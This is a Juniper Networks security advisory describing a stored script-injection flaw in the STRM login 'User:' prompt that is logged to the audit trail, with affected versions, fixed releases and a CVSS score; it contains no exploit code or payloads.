Support Support Downloads Knowledge Base Juniper Support Portal Community

Knowledge Base

Search our Knowledge Base sites to find answers to your questions.

Ask All Knowledge Base Sites All Knowledge Base Sites JunosE Defect (KA)Knowledge BaseSecurity AdvisoriesTechnical BulletinsTechnotes Sign in to display secure content and recently viewed articles

Script Insertion Vulnerability Via STRM "User:" Prompt

0

0

Article ID: JSA10437 SECURITY_ADVISORIES Last Updated: 09 May 2013Version: 1.0
Legacy Advisory Id:
PSN-2010-05-758
Product Affected:
This is a "zero day" issue which affects any STRM product running a vulnerable release of STRM software.
Problem:
Input from the "User:" prompt is not sanitized correctly when it is logged to the internal audit trail. If the input contains correctly composed, executable content, then it will be executed in the context of another user when that other user views the associated log entry (for example, when reviewing the audit trail on the device). If that other user is the administrator, then the executable content may be executed with root privileges. An attacker could exploit this vulnerability to supply a specially crafted script to the "User:" prompt on the login page which will be executed by a privileged user at some indeterminate future time when that privileged user views the resulting log entry.

All STRM platforms running any 2008.* software version earlier than 2008.3 patch 530 are affected. All 2009.* series releases and later versions are NOT affected.
Solution:
All software releases in the 2008.* series built on or after 2009-08-18 have been fixed for this issue. Releases containing the fix specifically include 2008.3 patch 530, 2009.1, and all subsequent releases.

This issue is being tracked as "STRM PR 6692". The PR is not viewable by customers but the label can be used for reference when discussing the issue with JTAC.

KB16765 - "In which releases are vulnerabilities fixed?" describes which release vulnerabilities are fixed as per our "End of Engineering" and "End of Life" support policies.

Workaround:
No known workaround exists for this issue. Care should be taken when reviewing logs and audit trails, especially if logged into an account with administrative privileges. Customers are urged to upgrade to fixed releases of software.
Implementation:

How To Obtain Fixed Software:
STRM Maintenance Releases and Patches are available at http://support.juniper.net from the "Download Software" links.
CVSS Score:
7.3 (AV:N/AC:M/Au:M/C:C/I:C/A:N/E:F/RL:W/RC:C)
Severity Level:
High
Severity Assessment:
Information for how Juniper Networks uses CVSS can be found at KB 16446 "Common Vulnerability Scoring System (CVSS) and Juniper's Security Advisories".

Related Links

Comment on this article > Affected Products Browse the Knowledge Base for more articles related to these product categories. Select a category to begin.

Getting Up and Running with Junos

Getting Up and Running with Junos Security Alerts and Vulnerabilities Product Alerts and Software Release Notices Problem Report (PR) Search Tool EOL Notices and Bulletins JTAC User Guide Customer Care User Guide Pathfinder SRX High Availability Configurator SRX VPN Configurator Training Courses and Videos End User Licence Agreement Global Search